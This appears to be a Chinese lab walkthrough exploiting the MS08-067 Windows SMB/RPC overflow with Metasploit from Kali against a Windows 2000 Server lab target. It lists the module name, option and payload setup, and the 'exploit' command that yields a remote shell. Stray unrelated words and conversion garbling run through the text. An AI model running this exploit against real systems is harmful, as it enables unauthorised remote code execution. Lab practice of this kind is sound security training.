MS08-067漏洞的全稱爲「Windows Server服務RPC請求緩衝區溢出漏洞」,若是用戶在受影響的系統上收到特製的 RPC 請求,則該漏洞可能容許遠程執行代碼。
在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證便可利用此漏洞運行任意代碼,此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。防火牆最佳作法和標準的默認防火牆配置,有助於保護網絡資源免受從企業外部發起的攻擊,默認狀況下能創建空鏈接。sql
此實驗使用的攻擊機是kali,靶機是Win2kServer
查看攻擊機ip地址shell
查看靶機ip地址數據庫
在Kali中使用metasploit,須要先啓動PostgreSQL
數據庫服務和metasploit
服務,而後就能夠完整的利用msf數據庫查詢exploit和記錄。windows
service postgresql start service metasploit start
用msfconsole
命令開啓metasploit的consoleapi
查找是否存在ms08-067漏洞,看到返回相應信息
網絡
輸入使用該漏洞攻擊程序:命令:use exploit/windows/smb/ms08_067_netapi
;執行結束後以下:
須要查看配置滲透攻擊所需的配置選項用show options
post
設置靶機和攻擊機的地址
3d
而後設置metasploit下的有效攻擊荷載(payload),能夠用tab鍵補齊,也能夠使用show payloads
命令直接查看全部選項
postgresql
options選項中還有一個Exploit target
項,這個是目標靶機的系統類型,用show targets
能夠進行查看,居然多達72個,能夠使用默認的id爲0的系統。code
再用show options
查看詳細信息
能夠看到全部信息都設置完畢。
接下來就是實施攻擊了,執行命令exploit
成功得到一個shell,並查看了ip地址。
ps:選擇不一樣的payload獲得的shell的形式不一樣。